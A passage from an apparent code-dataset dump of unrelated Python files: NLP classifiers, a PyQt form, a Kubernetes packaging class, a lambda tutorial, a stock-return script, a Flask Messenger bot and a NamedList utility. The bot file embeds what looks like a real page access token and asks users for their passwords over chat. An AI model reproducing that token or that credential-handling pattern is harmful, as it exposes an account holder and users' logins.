66.6% and for Testing as 33.3%. \\nThe sizes of: X_Train={0}\\nX_Test={1}\\ny_train={2}\\ny_test={3}\".format(X_train.size,X_test.size,y_train.size,y_test.size))\n\n# As the X_train,y_train,X_train2,...,etc are of type pandas.series.series, but \n#for passing these values to CountVectorizer it needs to be of type pandas.Dataframe. \n#Hence, converting the type.\nX_train=X_train.to_frame()\ny_train=y_train.to_frame()\nX_test=X_test.to_frame()\ny_test=y_test.to_frame()\n\nX_train2=X_train2.to_frame()\ny_train2=y_train2.to_frame()\nX_test2=X_test2.to_frame()\ny_test2=y_test2.to_frame()\n\nX_train3=X_train3.to_frame()\ny_train3=y_train3.to_frame()\nX_test3=X_test3.to_frame()\ny_test3=y_test3.to_frame()\n\n''' (C) Feature Engineering\n Bag of Words:The important part is to find the features from the data to make\n machine learning algorithms works. In this case, we have text. We need to convert this \n text into numbers that we can do calculations on. We use word frequencies. That is treating\n every document as a set of the words it contains. Our features will be the counts of each of \n these words.\n The term-document matrix is constructed in the block below for each of the 3 tokenizers.\n'''\nfrom sklearn.feature_extraction.text import CountVectorizer\ncount_vect=CountVectorizer()\ncount_vect2=CountVectorizer()\ncount_vect3=CountVectorizer()\n\ncounts=count_vect.fit_transform(X_train['TreeToken_cleaned_txt']) #fitting the data\ncounts2=count_vect2.fit_transform(X_train2['Regtoken_cleaned_txt'])\ncounts3=count_vect3.fit_transform(X_train3['Wordtoken_cleaned_txt'])\n\ncounts_test=count_vect.transform(X_test[\"TreeToken_cleaned_txt\"]) #transform the data\ncounts_test2=count_vect2.transform(X_test2[\"Regtoken_cleaned_txt\"])\ncounts_test3=count_vect3.transform(X_test3[\"Wordtoken_cleaned_txt\"])\n\n\n''' (D) and (E) Classifiers construction and evaluation :Different estimators are better \n suited for different types of data and different problems. The Naive Byers is chosen for this\n dataset as it relies on a very simple representation of the document (called the bag of words representation). \n Also, it recommended on sklearn cheatsheet that if the dataset is <100k and it's text then Naive \n Bayers is a good option. However other algorithms maybe applied as well.\n'''\nfrom sklearn.naive_bayes import MultinomialNB\nnb=MultinomialNB()\n\nnb.fit(counts, y_train) #fitting the model for Treebank tokenizer model\n\nnb2=MultinomialNB()\nnb2.fit(counts2, y_train2) #fitting the model for Regex tokenizer model\n\nnb3=MultinomialNB()\nnb3.fit(counts3, y_train3) #fitting the model for word tokenizer model\nprint(\"-----------\"*10)\nprint(\"For Multinomial Naive Bayers Classifier for Continuous Bag of Words (CBOW)\")\nprint(\"Accuracy for NB using TreeBankTokenizer :\", nb.score(counts_test, y_test))\nprint(\"Accuracy for NB using RegExp Tokenizer:\", nb2.score(counts_test2, y_test2))\nprint(\"Accuracy for NB using Word Tokenizer:\", nb3.score(counts_test3, y_test3))\ny_pred=nb.predict(counts_test) #evaluating the test set\nfrom sklearn.metrics import confusion_matrix,f1_score,accuracy_score,classification_report #importing all the metrics\nconfusion_matrix(y_test, y_pred) # confusion matrix also known as error matrix, allows visualization of the performance of an algorithm\n\ny_pred2=nb2.predict(counts_test2) #evaluating the test set for Regex tokenizer model\ny_pred3=nb3.predict(counts_test3) #evaluating the test set for word tokenizer model\nf1_score(y_test,y_pred, average=\"macro\" )\nprint(\"--------\"*10)\nprint(\"Classification report for Naive Bayers Classifier using WordTokenizer\\n\",classification_report(y_test,y_pred))\nprint(\"--------\"*10)\nprint(\"Classification report for Naive Bayers Classifier using RegexTokenizer\\n\",classification_report(y_test2,y_pred2))\nprint(\"--------\"*10)\nprint(\"Classification report for Naive Bayers Classifier using Treetokenizer\\n\",classification_report(y_test3,y_pred3))\nfrom sklearn.ensemble import RandomForestClassifier\n\nclf = RandomForestClassifier(n_estimators=1000, bootstrap=True, max_features='sqrt')\nclf.fit(counts, y_train) #fitting the Random Forest Model\ny_pred=clf.predict(counts_test) #evaluating the test set for random forest. Note: After here on only TreeBank tokenizer model\nprint(\"-----------\"*10)\nprint(\"For Random Forest Classifier for Continuous Bag of Words (CBOW) considering TreeBankTokenizer\")\nprint(\"The accuracy for RandomForest Classifier is :\", accuracy_score(y_test, y_pred))\nprint(\"The F1-Score for RandomForest Classifier is :\", f1_score(y_test,y_pred, average=\"macro\" ))\n'''\n Feature Engineering\n TF-IDF: A term-Document Matrix was constructed from the CountVectorizer() containing words or terms along columns and sentences along rows.\n The bag of words only considers the count of words which is not a good practice for doing sentiment analysis. \n Because some common words appear in many sentences which contain less importantnce. \n Therefore,TF-IDF is used in this assignment for Naive Bayers and Random Forest Algorithms\n which takes into account the word based upon its uniqueness.\n\n'''\nfrom sklearn.feature_extraction.text import TfidfTransformer\ntfidf_transformer = TfidfTransformer()\nX_train_tfidf = tfidf_transformer.fit_transform(counts) #counts is the count of words from Bag of words. To which we fit and transform.\nX_train_tfidf.shape #Displayes the dimensions of the variable\nfrom sklearn.naive_bayes import MultinomialNB\nclf1 = MultinomialNB().fit(X_train_tfidf, y_train)\ny_pred1 = clf1.predict(counts_test)\n\naccuracy_score(y_test, y_pred1) #evaluating the test set\nprint(\"-----------\"*10)\nprint(\"For Multinomial Naive Bayers Classifier for TF-iDF, considering TreeBankTokenizer\")\nprint(\"The accuracy for Multinomial Naive Bayers Classifier is :\", accuracy_score(y_test, y_pred1))\nprint(\"The F1-Score for Multinomial Naive Bayers Classifier is :\", f1_score(y_test,y_pred1, average=\"macro\" ))\nclf_1_randomforest= RandomForestClassifier(n_estimators=1000, bootstrap=True, max_features='sqrt')\nclf_1_randomforest.fit(X_train_tfidf, y_train) #fitting the Random Forest Model\ny_pred1=clf.predict(counts_test) #evaluating the test set for random forest. \naccuracy_score(y_test, y_pred1) #accuracy sore for the model \nprint(\"-----------\"*10)\nprint(\"For Random Forest Classifier for TF-iDF, considering TreeBankTokenizer\")\nprint(\"The accuracy for RandomForest Classifier is :\", accuracy_score(y_test, y_pred1))\nprint(\"The F1-Score for RandomForest Classifier is :\", f1_score(y_test,y_pred1, average=\"macro\" ))","sub_path":"1_sentiment_analy_NLP/sentiment_analysis_solution_code.py","file_name":"sentiment_analysis_solution_code.py","file_ext":"py","file_size_in_byte":18515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"645079572","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtGui import *\nfrom ProduitDAO import *\nfrom FournisseurDAO import *\nfrom RubriqueDAO import *\nfrom SsRubriqueDAO import *\nfrom ProductWindow import Ui_MainWindow\n\nclass Form1(QMainWindow):\n def __init__(self):\n super(Form1, self).__init__()\n\n self.ui = Ui_MainWindow()\n self.ui.setupUi(self)\n\n self.repo = ProduitDAO()\n self.repo_f = FournisseurDAO()\n self.repo_ssr = SsRubriqueDAO()\n self.repo_r = RubriqueDAO()\n self.model = QStandardItemModel(self.ui.listView)\n self.model_f = QStandardItemModel(self.ui.listView_fourni)\n self.model_ssr = QStandardItemModel(self.ui.listView_ssRubr)\n self.model_r = QStandardItemModel(self.ui.comboBox_rubr)\n\n self.ui.listView.setModel(self.model)\n self.ui.listView_fourni.setModel(self.model_f)\n self.ui.listView_ssRubr.setModel(self.model_ssr)\n self.ui.comboBox_rubr.setModel(self.model_r)\n # for product in self.repo.list():\n # item = QListWidgetItem(product)\n # self.ui.listWidget.addItem(item)\n\n self.ui.pushButton_add.clicked.connect(self.pushButton_add_clicked)\n self.ui.pushButton_upd.clicked.connect(self.pushButton_upd_clicked)\n self.ui.pushButton_del.clicked.connect(self.pushButton_del_clicked)\n self.ui.pushButton_ok.clicked.connect(self.pushButton_ok_clicked)\n self.ui.pushButton_no.clicked.connect(self.pushButton_no_clicked)\n self.ui.comboBox_rubr.currentIndexChanged.connect(self.comboBox_rubr_changed)\n\n self.modif = False\n self.maj_lists()\n\n def maj_lists(self):\n self.model.clear()\n for product in self.repo.list():\n\n item = QStandardItem(product.nom)\n item.setData(product, 1)\n # item = QStandardItem()\n self.model.appendRow(item)\n self.model_f.clear()\n for fournis in self.repo_f.list():\n\n item = QStandardItem(fournis.nom)\n item.setData(fournis, 1)\n # item = QStandardItem()\n self.model_f.appendRow(item)\n self.model_r.clear()\n for rubrique in self.repo_r.list():\n item = QStandardItem(rubrique.nom)\n item.setData(rubrique , 1)\n self.model_r.appendRow(item)\n @pyqtSlot(\"QModelIndex\")\n def on_listView_clicked(self, model_index):\n p = model_index.data(1)\n print (str(p.id) + \" \" + p.desc)\n\n def pushButton_add_clicked(self):\n pass\n\n @pyqtSlot(\"QModelIndex\")\n def on_listView_clicked(self, model_index):\n p = model_index.data(1)\n print (str(p.id) + \" \" + p.desc)\n\n def pushButton_upd_clicked(self):\n self.modif = True\n i = self.ui.listView.selectedIndexes()\n\n self.p_to_upd = i[0].data(1)\n # p = model_index.data(1)\n self.ui.lineEdit_name.setText(self.p_to_upd.nom)\n self.ui.lineEdit_img.setText(self.p_to_upd.imge)\n self.ui.doubleSpinBox_pricea.setValue(self.p_to_upd.prxa)\n self.ui.doubleSpinBox_pricev.setValue(self.p_to_upd.prxv)\n self.ui.textEdit_desc.setText(self.p_to_upd.desc)\n self.ui.spinBox_stock.setValue(self.p_to_upd.stock)\n if self.p_to_upd.activ == 0:\n self.ui.radioButton_e0.setChecked(True)\n if self.p_to_upd.publi == 0:\n self.ui.radioButton_p0.setChecked(True)\n\n def pushButton_del_clicked(self):\n pass\n def pushButton_ok_clicked(self):\n if self.modif == False :\n i = self.ui.listView_fourni.selectedIndexes()\n fourni = i[0].data(1)\n\n p = Produit(self.ui.lineEdit_name.text() , self.ui.textEdit_desc.toPlainText(), self.ui.doubleSpinBox_pricea.value() , self.ui.lineEdit_img.text() , self.Check_Publi() , self.Check_Etat() , self.ui.doubleSpinBox_pricev.value() , self.ui.spinBox_stock.value() , self.ui.doubleSpinBox_tva.value() , self.ui.comboBox_rubr.itemData(self.ui.comboBox_rubr.currentIndex(),1).id , fourni.id , id_prod=None)\n self.repo.insert(p)\n self.maj_lists()\n elif self.modif == True :\n i = self.ui.listView_fourni.selectedIndexes()\n fourni = i[0].data(1)\n\n self.p_to_upd.nom = self.ui.lineEdit_name.text()\n self.p_to_upd.desc = self.ui.textEdit_desc.toPlainText()\n self.p_to_upd.prxa = self.ui.doubleSpinBox_pricea.value()\n self.p_to_upd.imge = self.ui.lineEdit_img.text()\n self.p_to_upd.publi = self.Check_Publi()\n self.p_to_upd.activ = self.Check_Etat()\n self.p_to_upd.prxv = self.ui.doubleSpinBox_pricev.value()\n self.p_to_upd.stock = self.ui.spinBox_stock.value()\n self.p_to_upd.tva = self.ui.doubleSpinBox_tva.value()\n self.p_to_upd.rubr = self.ui.comboBox_rubr.itemData(self.ui.comboBox_rubr.currentIndex(), 1 ).id\n self.p_to_upd.fourni = fourni.id\n\n\n self.repo.update(self.p_to_upd)\n self.modif = False\n self.maj_lists()\n def comboBox_rubr_changed(self):\n i = self.ui.comboBox_rubr.itemData(self.ui.comboBox_rubr.currentIndex() , 1)\n self.model_ssr.clear()\n for ssrubr in self.repo_ssr.list_by_rubrique(i.id):\n item = QStandardItem(ssrubr.nom)\n item.setData(ssrubr , 1)\n self.model_ssr.appendRow(item)\n\n def pushButton_no_clicked(self):\n pass\n\n def Check_Publi(self):\n if self.ui.radioButton_p0.isChecked():\n v = 1\n else :\n v = 0\n return v\n\n def Check_Etat(self):\n if self.ui.radioButton_e0.isChecked():\n v = 1\n else :\n v = 0\n return v\n\n\napp = QApplication(sys.argv)\nwindow = Form1()\nwindow.show()\nsys.exit(app.exec_())\n","sub_path":"application python/Form.py","file_name":"Form.py","file_ext":"py","file_size_in_byte":5833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"187563436","text":"import logging\nimport os.path\nimport yaml\nimport json\nfrom collections import OrderedDict\nimport jsonpatch\nimport kpm.manifest_jsonnet as manifest\nfrom kpm.kubernetes import get_endpoint\nfrom kpm.utils import convert_utf8\nfrom kpm.kub_base import KubBase\n\n\nlogger = logging.getLogger(__name__)\n\n\n_mapping_tag = yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG\n\n\nclass KubJsonnet(KubBase):\n def __init__(self, *args, **kwargs):\n shards = kwargs.get(\"shards\", None)\n if shards.__class__ in [str, unicode]:\n shards = json.loads(shards)\n kwargs['shards'] = shards\n\n super(KubJsonnet, self).__init__(*args, **kwargs)\n\n self.tla_codes = {\"variables\": self._deploy_vars}\n if shards is not None:\n self.tla_codes[\"shards\"] = shards\n\n self.manifest = manifest.ManifestJsonnet(self.package, {\"params\": json.dumps(self.tla_codes)})\n\n def _create_namespaces(self):\n if self.namespace:\n ns = self.create_namespace(self.namespace)\n self._resources.insert(0, ns)\n\n @property\n def kubClass(self):\n return KubJsonnet\n\n @property\n def dependencies(self):\n if self._dependencies is None:\n self._fetch_deps()\n return self._dependencies\n\n def _init_resources(self):\n index = 0\n for resource in self._resources:\n index += 1\n resource[\"order\"] = index\n if 'protected' not in resource:\n resource[\"protected\"] = False\n\n def resources(self):\n if self._resources is None:\n self._resources = self.manifest.resources\n self._create_namespaces()\n return self._resources\n\n def prepare_resources(self, dest=\"/tmp\", index=0):\n for resource in self.resources():\n index += 1\n path = os.path.join(dest, \"%02d_%s_%s\" % (index,\n self.version,\n resource['file']))\n f = open(path, 'w')\n f.write(yaml.safe_dump(convert_utf8(resource['value'])))\n resource['filepath'] = f.name\n f.close()\n return index\n\n def build(self):\n result = []\n for kub in self.dependencies:\n kubresources = OrderedDict([(\"package\", kub.name),\n (\"version\", kub.version),\n (\"namespace\", kub.namespace),\n (\"resources\", [])])\n for resource in kub.resources():\n self._annotate_resource(kub, resource)\n kubresources['resources'].\\\n append(OrderedDict({\"file\": resource['file'],\n \"hash\": resource['value']['metadata']['annotations'].get('kpm.hash', None),\n \"protected\": resource['protected'],\n \"name\": resource['name'],\n \"kind\": resource['value']['kind'].lower(),\n \"endpoint\": get_endpoint(\n resource['value']['kind'].lower()).\n format(namespace=self.namespace),\n \"body\": json.dumps(resource['value'])}))\n\n result.append(kubresources)\n return {\"deploy\": result,\n \"package\": {\"name\": self.name,\n \"version\": self.version}}\n\n def _apply_patches(self, resources):\n for _, resource in resources.iteritems():\n if self.namespace:\n if 'namespace' in resource['value']['metadata']:\n op = 'replace'\n else:\n op = 'add'\n resource['patch'].append({\"op\": op, \"path\": \"/metadata/namespace\", \"value\": self.namespace})\n\n if len(resource['patch']):\n patch = jsonpatch.JsonPatch(resource['patch'])\n result = patch.apply(resource['value'])\n resource['value'] = result\n return resources\n","sub_path":"kpm/kub_jsonnet.py","file_name":"kub_jsonnet.py","file_ext":"py","file_size_in_byte":4183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"577527063","text":"\"\"\"\n lambda : 匿名函数\n 语法规则:lambda 参数:函数体\n\"\"\"\n# 定义有参数lambda\nfunc = lambda item:item % 2 == 0\nre = func(5)\nprint(re)\n\n# 定义无参数lambda\nfunc = lambda :100\nre = func()\nprint(re)\n\n# 定义多个参数lambda\nfunc =lambda a,b,c:a+b+c\nre = func(1,2,3)\nprint(re)\n\n# 定义无返回值lambda\nfunc = lambda a:print(\"变量是:\",a)\nfunc(10)\n\nclass A:\n def __init__(self,a):\n self.a = a\n\ndef fun01(obj):\n obj.a = 100\n\no = A(10)\nfun01(o)\nprint(o.a)\n\n# SyntaxError: can't assign to lambda\n# lambda 不支持赋值语句\n# func = lambda obj:obj.a = 100\n\n# lambda 只支持一条语句\ndef fun01(a,b):\n if a % 2 == 0:\n print(a+b)\n\n# lambda a,b:if a % 2 == 0: print(a+b)\n\n\nlist01 = [4,5,5,6,767,8,10]\n\n# def condition01(item):\n# return item % 2 == 0\n#\n# def condition02(item):\n# return item % 2\n#\n# def condition03(item):\n# return item > 10\n\ndef find(target,func):\n for item in target:\n if func(item):\n yield item\n\n# for item in find(list01,condition03):\n# print(item)\n\nfor item in find(list01,lambda item:item > 10):\n print(item)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"python_base/code/day17/demo01.py","file_name":"demo01.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"236133392","text":"import csv\nimport StockReport\nfrom itertools import islice\n\nstockList = []\nstockListFix = []\n\nwith open('us-derived-quarterly.csv') as csvfile:\n readCSV = csv.reader(csvfile, delimiter=';')\n for row in readCSV:\n if (not row[0]) or (not row[3]) or (not [4]) or (not row[6]) or (not row[26]) or (row[0] == \"Ticker\"):\n continue\n sr = StockReport.StockReport(row[0], row[4], row[3], row[6], row[26])\n stockList.append(sr)\n\ni = 1\nfor report in stockList:\n if(report.quarter == \"Q1\"):\n for report2 in stockList:\n if(report2.ticker == report.ticker and report2.quarter == \"Q2\" and report2.year == report.year):\n report.endDate = report2.startDate\n if(report.quarter == \"Q2\"):\n for report2 in stockList:\n if(report2.ticker == report.ticker and report2.quarter == \"Q3\" and report2.year == report.year):\n report.endDate = report2.startDate\n if(report.quarter == \"Q3\"):\n for report2 in stockList:\n if(report2.ticker == report.ticker and report2.quarter == \"Q4\" and report2.year == report.year):\n report.endDate = report2.startDate\n if(report.quarter == \"Q4\"):\n for report2 in stockList:\n if(report2.ticker == report.ticker and report2.quarter == \"Q1\" and int(report2.year) == int(report.year) + 1):\n report.endDate = report2.startDate\n print(i)\n i+=1\n if(i>100000): break\n\nfor report in stockList:\n if (not report.ticker) or (not report.quarter) or (not report.year) or (not report.startDate) or (not report.endDate) or (not report.fscore):\n continue\n else:\n stockListFix.append(report)\n\ni = 1\nticker = \"\"\nrowNum=0\nfor report in stockListFix:\n startPrice = 0\n endPrice = 0\n ratio = 0\n with open('us-shareprices-daily.csv') as csvfile:\n if (ticker != report.ticker):\n ticker = report.ticker\n rowNum=0\n for row in islice(csv.reader(csvfile), 0, None):\n\n rowTicker = row[0].split(\";\")[0]\n rowDate = row[0].split(\";\")[2]\n rowPrice = row[0].split(\";\")[3]\n rowNum +=1\n\n if (not rowTicker) or (not rowDate) or (not rowPrice) or (rowTicker == \"Ticker\"):\n continue\n elif (rowTicker == report.ticker) and (rowDate == report.startDate):\n startPrice = rowPrice\n elif (rowTicker == report.ticker) and (rowDate == report.endDate):\n endPrice = rowPrice\n break\n else:\n for row in islice(csv.reader(csvfile), rowNum-365, None): #starting at rowNum was skipping some start date values so adjusted it back a year\n\n rowTicker = row[0].split(\";\")[0]\n rowDate = row[0].split(\";\")[2]\n rowPrice = row[0].split(\";\")[3]\n\n if (not rowTicker) or (not rowDate) or (not rowPrice) or (rowTicker == \"Ticker\"):\n continue\n elif (rowTicker == report.ticker) and (rowDate == report.startDate):\n startPrice = rowPrice\n elif (rowTicker == report.ticker) and (rowDate == report.endDate):\n endPrice = rowPrice\n break\n\n if (float(endPrice) > 0) and (float(startPrice) > 0):\n ratio = float(endPrice) / float(startPrice)\n report.returns = ratio\n print(report)\n f = open(\"output.txt\", \"a\")\n f.write(report.ticker + \",\" + report.startDate + \",\" + report.endDate + \",\" + str(report.fscore) + \",\" + str(report.returns) + \"\\n\")\n print(i)\n i += 1\n","sub_path":"CSVreader.py","file_name":"CSVreader.py","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"127543887","text":"from flask import Flask, request\nimport json\nimport requests\nimport chatbot\nimport os\napp = Flask(__name__)\nVERIFY_TOKEN = '@thaonguyen'\nFB_API_URL = 'https://graph.facebook.com/v5.0/me/messages'\nPAGE_ACCESS_TOKEN = 'EAAVJSnewzxkBAEPvZArsPw3Y7R2WvocuukAnpHTiNZBdywPIO4JESkeraVJz1c8vXgu1ZCtxTlbtZCZAsMpZBZBTiSB4YYUzwVfmsU4QTdX1ZBJBNrCwxvXktrOSd93jxtKj147U6XjysbOFDsklgVNWEMrLUydelJ28chC1K2yPVpXlrrkZA9RKO8JTeUTlUtyAZD'\n\ncount=0\ncheckmk=False\ntk=''\nmk=''\ndef send_message(recipient_id, text):\n \"\"\"Send a response to Facebook\"\"\"\n params = {\n \"access_token\": PAGE_ACCESS_TOKEN\n }\n headers = {\n \"Content-Type\": \"application/json\"\n }\n data = json.dumps({\"recipient\": {\n \"id\": recipient_id\n },\n \"message\": {\n \"text\": text\n }})\n print(data)\n r = requests.post(\"https://graph.facebook.com/v5.0/me/messages\",params=params, headers=headers, data=data)\n\n return r.json()\n\n\ndef showmess(data):\n try:\n messaging = ((data[\"entry\"][0][\"messaging\"]))\n return(messaging[0][\"message\"][\"text\"])\n except :\n return \"loi messaging\"\n\n\ndef id_replace(data):\n try:\n id_user = data[\"entry\"][0][\"messaging\"][0][\"sender\"][\"id\"]\n return id_user\n except:\n return \"loi lay id\"\n\ndef laytkmk(data):\n send_message(id_replace(data),\"nhập mssv: \")\n tk=showmess(data)\n send_message(id_replace(data),\"nhập mk: \")\n mk=showmess(data)\n\n@app.route('/', methods=['GET'])\ndef verify():\n # when the endpoint is registered as a webhook, it must echo back\n # the 'hub.challenge' value it receives in the query arguments\n if request.args.get(\"hub.mode\") == \"subscribe\" and request.args.get(\"hub.challenge\"):\n if not request.args.get(\"hub.verify_token\") == VERIFY_TOKEN:\n return \"Verification token mismatch\", 403\n return request.args[\"hub.challenge\"], 200\n return \"Hello world\", 200\n\n\n@app.route('/', methods=['POST'])\ndef webhook():\n global count,tk,mk\n data = request.get_json()\n try:\n if showmess(data)=='tkb':\n send_message(id_replace(data),\"Đang xử lý\"+\"Buoc:\"+str(count+1))\n send_message(id_replace(data),\"moi nhap mssv: \")\n count=1\n elif (showmess(data)).isdigit() and count==1:\n send_message(id_replace(data),\"Đang xử lý\"+\"Buoc:\"+str(count+1))\n send_message(id_replace(data),\"moi nhap mat khau\") \n tk=showmess(data)\n count=0\n elif count!=1 :\n mk=showmess(data) \n if tk!='' and mk!='':\n mk=showmess(data)\n send_message(id_replace(data),\"Đang xử lý\")\n try: \n send_message(id_replace(data),chatbot.xulyngay(tk,mk))\n count=0;tk='';mk=''\n except :\n send_message(id_replace(data),\"lỗi trong quá trình lấy thời khóa biểu\")\n count=0;tk='';mk=''\n \n except Exception as e:\n send_message(id_replace(data),\"loi nguyen trong\")\n print(e)\n return data\n\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"webhooks.py","file_name":"webhooks.py","file_ext":"py","file_size_in_byte":3143,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"81335769","text":"\"\"\"\nCopyright (c) 2015 Jaye Doepke\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\nfrom __future__ import with_statement, absolute_import, unicode_literals, division, print_function\n\nfrom bisect import bisect_left, insort_left\nfrom collections import defaultdict\nfrom copy import copy, deepcopy\nfrom threading import RLock\n\nimport six\nfrom six.moves import UserList, zip, range\n\nfrom .lock import LockContextManager\n\n\nclass NamedList(UserList):\n \"\"\"\n A class for maintaining a list of named values.\n The names are always strings.\n Duplicate names are allowed.\n Is threadsafe.\n \"\"\"\n __slots__ = ['_lock', 'data', '_index', '_rindex']\n\n def __init__(self, init_data=None):\n \"\"\"\n :param init_data: optional - either a NamedList or an iterable of (name, value) tuples.\n \"\"\"\n super(NamedList, self).__init__()\n self._lock = LockContextManager(RLock())\n\n if isinstance(init_data, NamedList):\n with init_data._lock:\n self.data = copy(init_data.data)\n self._index = copy(init_data._index)\n self._rindex = copy(init_data._rindex)\n return\n\n self.data = []\n self._index = defaultdict(list)\n self._rindex = {}\n\n if init_data is not None:\n if isinstance(init_data, dict):\n for name, value in six.iteritems(init_data):\n self.append(name, value)\n else:\n for name, value in init_data:\n self.append(name, value)\n\n def append(self, name, value):\n \"\"\"\n Append a value to this NamedList.\n :param str name:\n :param value:\n \"\"\"\n if not isinstance(name, six.string_types):\n raise TypeError(\"key must be a string\")\n with self._lock:\n self.data.append(value)\n index = len(self.data) - 1\n self._index[name].append(index)\n self._rindex[index] = name\n\n def insert(self, index, name, value):\n self_len = len(self)\n if index > self_len:\n raise ValueError(\"cannot insert into %s at index greater than current len()\" % (self.__class__.__name__,))\n\n to_upshift = dict((i, self._rindex[i]) for i in range(len(self) - 1, index - 1, -1)) # Go in reverse order\n for upshift_index, upshift_name in six.iteritems(to_upshift):\n plus_one = upshift_index + 1\n\n # _index\n index_list = self._index[upshift_name]\n index_list.remove(upshift_index)\n insort_left(index_list, plus_one)\n\n # _rindex\n del self._rindex[upshift_index]\n self._rindex[plus_one] = upshift_name\n\n self.data.insert(index, value)\n insort_left(self._index[name], index)\n self._rindex[index] = name\n\n def extend(self, other):\n \"\"\"\n Add all the values from another NamedList to this one,\n or add all the values from a dict whose keys are all name strings.\n\n :param other: A NamedList or dict with all string keys.\n \"\"\"\n if isinstance(other, NamedList):\n with self._lock:\n with other._lock:\n for name, value in other.items():\n self.append(name, value)\n elif isinstance(other, dict):\n with self._lock:\n if not all(isinstance(key, six.string_types) for key in other.keys()):\n raise ValueError(\"dict contains non-string keys\")\n for name, value in six.iteritems(other):\n self.append(name, value)\n else:\n raise TypeError(\"can extend from a %s\" % (other.__class__.__name__,))\n\n def __iter__(self):\n return iter(self.data)\n\n def items(self):\n \"\"\"\n :return: iterator that returns (name, value) pairs.\n \"\"\"\n for i in range(len(self)):\n yield (self._rindex[i], self.data[i])\n\n def iteritems(self):\n return self.items()\n\n def _negative_index_to_positive(self, index):\n # Convert a negative list index to a positive one.\n with self._lock:\n while index < 0:\n index += len(self.data)\n return index\n\n def get_name(self, index):\n \"\"\"\n :param int index: a list element index\n :return: the name of the element\n \"\"\"\n with self._lock:\n index = self._negative_index_to_positive(index)\n try:\n return self._rindex[index]\n except KeyError:\n raise IndexError(\"index %s out of range\" % (index,))\n\n def set_name(self, index, name):\n \"\"\"\n The the name of an element in the list.\n :param int index: a list element index\n :param str name: a name string\n \"\"\"\n with self._lock:\n index = self._negative_index_to_positive(index)\n old_name = self.get_name(index)\n self._index[old_name].remove(index)\n insort_left(self._index[name], index)\n self._rindex[index] = name\n\n def __copy__(self):\n with self._lock:\n return NamedList(self)\n\n def __deepcopy__(self, memo):\n with self._lock:\n return NamedList((name, deepcopy(value, memo)) for name, value in self.items())\n\n def __contains__(self, name):\n with self._lock:\n return name in self._index\n\n def __add__(self, other):\n with self._lock:\n if isinstance(other, NamedList):\n result = NamedList(self)\n for name, value in other.items():\n result.append(name, value)\n return result\n else:\n raise TypeError(\"cannot add %s and %s\" % (self.__class__.__name__, other.__class__.__name__))\n\n def __iadd__(self, other):\n with self._lock:\n self.extend(other)\n return self\n\n def __mul__(self, other):\n with self._lock:\n if not isinstance(other, six.integer_types):\n raise TypeError(\"%s can only multiply by an int\" % (self.__class__.__name__,))\n if other < 0:\n raise ValueError(\"%s cannot multiply by an int < 0 \" % (self.__class__.__name__,))\n with self._lock:\n result = NamedList()\n for i in range(other):\n result.extend(self)\n return result\n\n def __len__(self):\n with self._lock:\n return len(self.data)\n\n def index(self, name, start=0):\n \"\"\"\n :param str name: the name of an element in the list\n :param int start: start from this element\n :return: the first index of a value with ``name``.\n \"\"\"\n with self._lock:\n if name not in self._index:\n raise ValueError(\"%s is not in the %s\" % (name, self.__class__.__name__))\n indices = self._index[name]\n i = bisect_left(indices, start)\n if i >= len(indices):\n raise ValueError(\"%s is not in the %s\" % (name, self.__class__.__name__))\n return indices[i]\n\n def __getitem__(self, key):\n \"\"\"\n NamedList supports four methods of indexed access::\n\n my_named_list = NamedList([\n (\"foo\", \"bar\"),\n (\"bar\", \"foo\"),\n (\"foo\", 1),\n (\"bar\", NamedList([(\"tholomew\", 5)]))\n ])\n\n my_named_list[0]\n # \"bar\"\n\n my_named_list[1:3]\n # NamedList([(\"bar\", \"foo\"), (\"foo\", 1)])\n\n my_named_list[\"foo\"]\n # [\"bar\", 1]\n\n my_named_list[\"bar\", \"tholomew\"] # Nested NamedList access\n # 5\n \"\"\"\n with self._lock:\n if isinstance(key, six.string_types):\n # Get list of all values with this name\n if key not in self._index:\n raise KeyError(key)\n indices = self._index[key]\n return [self.data[i] for i in indices]\n\n elif isinstance(key, six.integer_types):\n # Get specific index\n return self.data[key]\n\n elif isinstance(key, slice):\n # Get slice\n indices = range(*key.indices(len(self)))\n return NamedList((self.get_name(i), self.data[i]) for i in indices)\n\n elif isinstance(key, tuple):\n # Get item recursivly\n key, other_keys = key[0], key[1:]\n lst = self[key]\n if not other_keys:\n # End recursion\n return lst\n for element in lst:\n if isinstance(element, NamedList):\n return element[other_keys]\n elif isinstance(element, dict) and len(other_keys) == 1:\n return [element[other_keys[0]]]\n raise KeyError(\"cannot recurse with key '%s'\" % (key,))\n\n else:\n raise TypeError(\"key must be a string, int, or slice\")\n\n def __getslice__(self, i, j):\n with self._lock:\n return self.__getitem__(slice(i, j, 